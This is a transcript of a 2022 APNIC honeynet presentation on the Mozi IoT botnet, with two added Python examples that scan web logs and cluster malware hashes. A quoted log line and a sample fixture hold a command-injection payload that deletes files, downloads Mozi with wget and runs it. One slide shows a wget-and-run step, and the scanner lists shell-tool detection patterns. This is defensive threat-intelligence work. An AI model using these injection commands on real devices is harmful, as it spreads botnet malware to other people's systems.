
Observations from the APNIC Community Honeynet Project, presentation by Adli Wahid for the CNCERT International Partnership Conference 2022


Observations from the APNIC Community Honeynet Project, presentation by Adli Wahid for the CNCERT International Partnership Conference 2022, delivered on 14 December 2022.


  1. Observations from the APNIC Community Honeynet Project
     Adli Wahid, Senior Internet Security Specialist, APNIC
     adli@apnic.net || www.apnic.net
  2. Let's Connect!
     • LinkedIn: Adli Wahid
     • Email: adli@apnic.net
  3. Discussion
     1. Background
     2. Mozi (IoT) Botnet
     3. Observations
     4. Mitigation & Remediation
     Note: credits to Anutsetsen Enkhzoright (anutsetsen.e@khanbank.com) for initial work on the research & presentation
  4. Background (Source of Data)
     • APNIC Community Honeynet Project
       o Collaboration with partners across AP
       o Including capacity building related activities
     • Honeypots & Honeynet
       o Anything that interacts with the honeypots is suspect
       o Confirmed with observed actions + artifacts (payload, logs, etc.)
     • Types of Honeypots
       o Telnet/SSH (Cowrie) ** relevant for this talk
       o 100++ sensors
  5. What We Observe
     • Attacks that spread via
       o SSH & Telnet brute force
       o Exploiting _known_ vulnerabilities
     • Nature of
       o Malware - cryptominers, DDoS agents, etc.
       o Source of attack == infected devices*
     • Left of the Hack
       o Observations on attacker's infrastructure
       o Bot recruitment
       o Scripts, malware payload, traffic
     • Attacks that no one pays attention to ☺
     • Share feeds with network operators (DASH) & partners
     [Diagram: DDoS attack timeline. "Left of the Hack": build/buy infrastructure, write malware, infect devices, set up Command & Control. Then "The Hack".]
  6. Mozi Botnet
     • Discovered in September 2019 by Netlab
     • Significant outbreak in Sept 2020 (100k nodes)
     • Targets IoT devices (MIPS, ARM, PPC and x86)
     • Uses unique P2P Command & Control
       o BitTorrent Distributed Hash Table (DHT) as carrier protocol
       o Makes it robust & tricky* to track
     • Some capabilities (from config)
       o Perform a DDoS attack
       o Update executable from given URL
       o Execute command via shell or system()
       o DNS spoofing
       o HTTP session hijacking (with JS)
       o Mining
     • Code base from other botnets
       o Gafgyt
       o Mirai
     • Propagation
       o 14 HTTP-based exploits via the web interface of IoT devices
       o Mainly Telnet**, FTP, SSH credentials brute force
  7. (Nmap scan of a host serving the payload)
     Nmap scan report for host-x.static.[redacted].net (219.x.y.184)
     Host is up (0.062s latency).
     PORT      STATE SERVICE VERSION
     53387/tcp open  elf-exe ELF 32-bit executable file
     This host was serving malware (HTTP on port 53387). Shodan fingerprints the device as a DVR.
  8. Mozi author "taken custody" by LEA in 2021
     https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/
     Is it still around?
  9. 2022 - Still Active?
     durian.fsck.my -- 93.56.202.158 [10/Oct/2022:14:24:55 +0900] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://93.56.202.158:53157/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 301 0
     Check your webserver logs for Mozi.a or Mozi.m
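The "check your webserver logs" advice on this slide, as an added example (not from the presentation or APNIC): a small scanner for access-log lines in the shape shown above that URL-decodes the request and flags the Mozi indicators the slides name (Mozi.a / Mozi.m names, the bare ".i" binary, a download command smuggled into a query string). The sensor name and IPs in the sample lines are constructed (documentation ranges), not real hosts.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines in the same layout as the slide's durian.fsck.my entry.
# Documentation-range IPs only. Line 1 mimics the Mozi propagation request, line 2 is benign,
# line 3 fetches a ".i" binary from a high random port (the pattern on the next slides).
SAMPLE_LOG = """\
durian.example -- 203.0.113.7 [10/Oct/2022:14:24:55 +0900] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://203.0.113.7:53157/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 301 0
durian.example -- 198.51.100.4 [10/Oct/2022:14:25:10 +0900] "GET /index.html HTTP/1.1" 200 5120
durian.example -- 203.0.113.9 [11/Oct/2022:02:11:43 +0900] "GET /cgi-bin/luci?cmd=wget%20http://203.0.113.9:41235/.i HTTP/1.1" 404 0
"""

LINE_RE = re.compile(
    r'^(?P<sensor>\S+) -- (?P<src>\d+\.\d+\.\d+\.\d+) ?\[(?P<ts>[^\]]+)\] '
    r'"(?P<req>[^"]*)" (?P<status>\d{3}) (?P<bytes>\d+)'
)

# Indicators are matched case-insensitively on the URL-decoded request line, so "+" and "%20"
# tricks do not hide them.
INDICATORS = {
    "mozi_dropper": re.compile(r"mozi\.[am]\b", re.I),            # Mozi.a / Mozi.m file names
    "dot_i_binary": re.compile(r"://[\d.]+:\d+/\.i\b", re.I),       # http://IP:port/.i
    "cmd_injection": re.compile(r"[;&|=]\s*(wget|curl|sh|busybox)\b", re.I),
}


def scan_log(text):
    """Return one dict per suspicious line: timestamp, source IP, decoded request, indicator names."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the expected layout; a real deployment would count these
        decoded = unquote_plus(m.group("req"))
        matched = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
        if matched:
            hits.append({"ts": m.group("ts"), "src": m.group("src"),
                         "indicators": matched, "request": decoded})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h["ts"], h["src"], ",".join(h["indicators"]))
```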
  10. Observations in APNIC Honeynet Project
     • In 05/2022, we observed an ELF binary ".i" in some URLs
       o Post-login downloads
     • Pattern looks familiar: http://xxx.xxx.xxx.xxx:random_port/.i
     • IP in URL can be the same as the attacking host or different
     Feed columns: timestamp, source IP (attacking/spreading), URL of the IP hosting the binary (:random_port), country, ASN
       o 2022-05-25T11:23:24.433026,59.3.30.251,hxxp://59.3.30.251:10035/.i,KR,4766
       o 2022-05-25T17:27:31.588334,222.174.143.18,hxxp://222.174.143.18:56102/.i,CN,4134
       o 2022-05-26T03:30:41.219380,95.154.75.244,hxxp://95.154.75.244:12107/.i,RU,44724
       o 2022-05-26T06:51:04.319952,37.255.216.173,hxxp://51.19.186.165:23349/.i,IR,58224
       o 2022-05-26T07:58:51.970983,167.179.185.255,hxxp://31.168.218.95:28681/.i,AU,4764
       o 2022-05-26T07:35:24.881174,114.230.69.4,hxxp://114.230.69.4:10816/.i,CN,4134
       o 2022-05-26T08:32:08.109785,167.179.61.43,hxxp://46.237.87.18:9331/.i,HK,135273
     Observed sequence on the honeypot:
       1. Telnet username:password
       2. wget http://x.x.x.x:nnnn/.i
  11. The ".i" & Finding Mozi
     • .i: ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, stripped
       o SHA256 a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3
       o Known to VirusTotal
     • Finding Mozi: maybe we can find Mozi.m or Mozi.a on the web server?
       o If .i is served from $IP:PORT
       o Then download $IP:PORT/mozi.a || $IP:PORT/mozi.m || $IP:PORT/Mozi.m || $IP:PORT/Mozi.a || $IP:PORT/config
  12. Observations – (hash) fingerprints
     ~/feeds/dload/20220601/50.83.145.125:43900$ sha256sum * .i
     a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3  mozi.a
     a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3  Mozi.a
     a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3  mozi.m
     9bcbb326a28b09faeb6fbfc0e7d68fe6ff79b7248c7b2510aa8dd11cc55e0356  Mozi.m
     b82e420c071c1c1a5cbf1ad8ba143f5b804a6fe4fd2fbcd28db20f471b7065ab  .i
     ~/feeds/dload/20220601/222.103.181.173:1117$ sha256sum * .i
     479768e26969e241244a475f97b1268fd02e303a8d6b5d15c71b552815cae14b  mozi.a
     a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3  Mozi.a
     a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3  mozi.m
     a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3  Mozi.m
     6d41f05fe458414332980d420e42b12d01bd21497631f5b6e60fc8082c170bed  .i
     ~/feeds/dload/20221011/36.229.220.191:27611$ sha256sum * .i
     23171f17aa39a4b7c9c492c9bc4668697f68e1863c77ef6502e38ca53860c2fa  i
     b6d6ee5d756cfe9a9638769abef15294d7a9189ac49dc43d9b06fb04976b3bf5  mozi.a
     a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3  Mozi.a
     b9410c9df55f3bdfe0cc37f215bbf6d77f85bf5bdad9eb965ad2130f43138657  mozi.m
     b9410c9df55f3bdfe0cc37f215bbf6d77f85bf5bdad9eb965ad2130f43138657  Mozi.m
     289aba46ba734b2aef8a82dc983ef1451e303fc33c05820dd07cb7551ad1a310  .i
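Slides 10 through 12 describe one analyst workflow: parse the feed records (attacking IP vs. the IP:port hosting ".i"), collect what each drop directory serves, and compare SHA-256 fingerprints across directories. This added example (not APNIC's tooling) implements that workflow on constructed data; the IPs are documentation ranges, the ASNs are reserved values, and the file contents are arbitrary stand-ins rather than real samples.

```python
import hashlib
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed feed records in the slides' layout (timestamp, attacking IP, download URL, country,
# ASN) with documentation-range IPs and reserved ASNs. The third record is the case where the
# host serving the binary differs from the attacking host.
FEED = """\
2022-05-25T11:23:24.433026,203.0.113.5,hxxp://203.0.113.5:10035/.i,KR,64496
2022-05-26T03:30:41.219380,198.51.100.9,hxxp://198.51.100.9:12107/.i,RU,64497
2022-05-26T06:51:04.319952,203.0.113.77,hxxp://192.0.2.40:23349/.i,IR,64498
"""


def parse_feed(text):
    """Split each record and flag whether the .i binary is hosted on the attacking host itself."""
    records = []
    for line in text.splitlines():
        ts, src, url, cc, asn = line.split(",")
        # Feeds defang the scheme as hxxp; restore it only so urlsplit can parse the netloc.
        host, _, port = urlsplit(url.replace("hxxp://", "http://", 1)).netloc.partition(":")
        records.append({"ts": ts, "src": src, "host": host, "port": int(port),
                        "cc": cc, "asn": asn, "self_hosted": host == src})
    return records


# Constructed stand-ins for files collected from two $IP:PORT directories, using the file names
# slide 12 lists. Content "A" is served under several names on both hosts, mirroring the
# repeated a04ac6... hash on the slide; the bytes are arbitrary, not real samples.
SAMPLES = {
    "203.0.113.5:10035":  {"mozi.a": b"A", "Mozi.a": b"A", "mozi.m": b"A", "Mozi.m": b"B", ".i": b"C"},
    "198.51.100.9:12107": {"mozi.a": b"D", "Mozi.a": b"A", "mozi.m": b"A", "Mozi.m": b"A", ".i": b"E"},
}


def cluster_by_sha256(samples):
    """Map each SHA-256 to the (host, file name) pairs that served it, across all directories."""
    groups = defaultdict(list)
    for host, files in samples.items():
        for name, data in files.items():
            groups[hashlib.sha256(data).hexdigest()].append((host, name))
    return groups


def recurring_hashes(samples):
    """Hashes seen on more than one host: the same payload re-used across drop points."""
    return {h: sorted(pairs) for h, pairs in cluster_by_sha256(samples).items()
            if len({host for host, _ in pairs}) > 1}


if __name__ == "__main__":
    for r in parse_feed(FEED):
        where = "self-hosted" if r["self_hosted"] else "third-party host"
        print(r["ts"], r["src"], "->", f'{r["host"]}:{r["port"]}', where)
    for h, pairs in recurring_hashes(SAMPLES).items():
        print(h[:16], len(pairs), "files on", len({p[0] for p in pairs}), "hosts")
```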
  13. Slowly increasing over the last 7 months
     [Chart: Daily Hits. Snapshot on 14/22/2022]
  14. IPs from AP Region (Last 7 Months) [Snippet]
     • 2022-12-12T23:57:24.533309,110.x.y.59,hxxp://110.x.y.59:43509/.i [Most Common]
     • 2022-08-30T11:07:19.374102,202.x.y.26,hxxp://61.a.b.131:58871/.i [Alternative]
     • 2022-10-18T12:34:38.452976,202.x.y.26,hxxp://219.a.b.184:53387/.i [Repeat Offender]
     [Chart: IPs from AP region by operators, 67%]
  15. Mitigation & Remediation (not just Mozi)
     • The Usual Advice
       o Harden device – patch, strong credentials, access controls
         ▪ But whose job is it anyway to monitor & remediate?
         ▪ Vulnerabilities sustain 'old' worms & bots
       o TL;DR – same story
       o There must be a better way
       o Responding after the fact
     • Engagement with other stakeholders on the impact of insecure IoTs, awareness, policies, PSIRTs
     • Strengthen collaboration & the eco-system
  16. Thank You!
     Adli Wahid <adli@apnic.net>
  17. Resources
     1. https://blog.netlab.360.com/mozi-another-botnet-using-dht/
     2. https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/
     3. Mozi Tools - https://kn0wledge.fr/projects/mozitools/
     4. https://www.microsoft.com/security/blog/2021/08/19/how-to-proactively-defend-against-mozi-iot-botnet/
     5. ShadowServer Foundation - https://www.shadowserver.org/what-we-do/network-reporting/get-reports/
     6. APNIC DASH – https://dash.apnic.net
     7. APNIC Community Honeynet Project – adli@apnic.net